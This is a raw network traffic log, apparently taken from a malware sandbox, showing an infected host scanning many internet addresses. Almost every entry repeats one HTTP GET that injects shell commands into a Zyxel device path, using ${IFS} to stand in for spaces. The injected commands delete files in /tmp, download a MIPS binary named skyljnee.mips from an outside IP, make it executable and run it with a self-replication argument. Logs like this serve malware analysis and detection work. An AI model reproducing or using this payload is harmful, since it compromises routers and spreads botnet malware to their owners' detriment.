                                                Jan 28, 2024 10:16:36.988146067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7321192.168.2.236055491.168.234.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988157988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7322192.168.2.234612452.101.182.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988198996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7323192.168.2.233776686.154.142.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988234997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7324192.168.2.235175675.195.163.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988238096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7325192.168.2.234867684.174.88.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988413095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7326192.168.2.2334644172.150.237.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988442898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7327192.168.2.233337085.166.4.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988470078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7328192.168.2.2353702183.108.154.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988493919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7329192.168.2.234161698.7.143.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988528967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7330192.168.2.234566258.121.217.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988554001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7331192.168.2.2360298201.124.19.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988581896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7332192.168.2.2348590128.247.212.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988625050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7333192.168.2.2333942206.94.69.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988661051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7334192.168.2.2332964136.187.183.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988661051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7335192.168.2.235554882.35.188.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988693953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7336192.168.2.2333064126.12.194.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988723993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7337192.168.2.235565699.12.152.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988750935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7338192.168.2.2345044184.238.143.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988775969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7339192.168.2.2355604201.131.239.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988831043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7340192.168.2.235981470.29.164.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988835096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7341192.168.2.2353482107.153.9.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988882065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7342192.168.2.235084690.224.167.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988905907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7343192.168.2.2337948105.130.220.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988915920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7344192.168.2.234538075.210.199.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988945007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7345192.168.2.2339968205.183.105.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.988984108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7346192.168.2.2348182114.48.59.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989005089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7347192.168.2.2347890223.217.0.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989017963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7348192.168.2.236034474.28.186.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989058018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7349192.168.2.235321484.195.238.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989082098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7350192.168.2.234032213.202.16.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989093065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7351192.168.2.2332830112.111.154.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989142895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7352192.168.2.2356938111.213.222.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989187002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7353192.168.2.2349172177.10.240.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989203930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7354192.168.2.2360644178.225.104.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989218950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7355192.168.2.235316868.55.163.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989273071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7356192.168.2.2355104173.219.242.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989284039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7357192.168.2.2353812115.251.178.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989308119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7358192.168.2.2347660181.74.28.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989342928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7359192.168.2.2346848181.183.163.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989387035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7360192.168.2.2346374158.164.183.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989404917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7361192.168.2.2334784186.175.101.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989437103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7362192.168.2.2355482106.162.50.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989449978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7363192.168.2.2336810184.11.146.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989475012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7364192.168.2.2355076128.56.20.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989506006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7365192.168.2.2351052173.80.1.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989507914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7366192.168.2.234145065.34.218.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989535093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7367192.168.2.2345514213.26.121.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989567995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7368192.168.2.2345324136.243.213.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989617109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7369192.168.2.2335594171.119.21.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989643097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7370192.168.2.2337036159.117.187.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989655018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7371192.168.2.2360070175.160.162.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989696980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7372192.168.2.2343000160.127.103.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989737988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7373192.168.2.235808235.153.157.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989762068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7374192.168.2.2334688193.213.187.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989805937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7375192.168.2.233758050.93.136.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989850044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7376192.168.2.2337864136.160.77.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989850044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7377192.168.2.2340920175.233.84.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989869118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7378192.168.2.235176887.249.174.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989901066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7379192.168.2.235791492.217.195.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989933014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7380192.168.2.2337816191.198.214.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989953995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7381192.168.2.233992291.231.52.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.989974976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7382192.168.2.2338500103.7.39.53443
                                                TimestampBytes transferredDirectionData
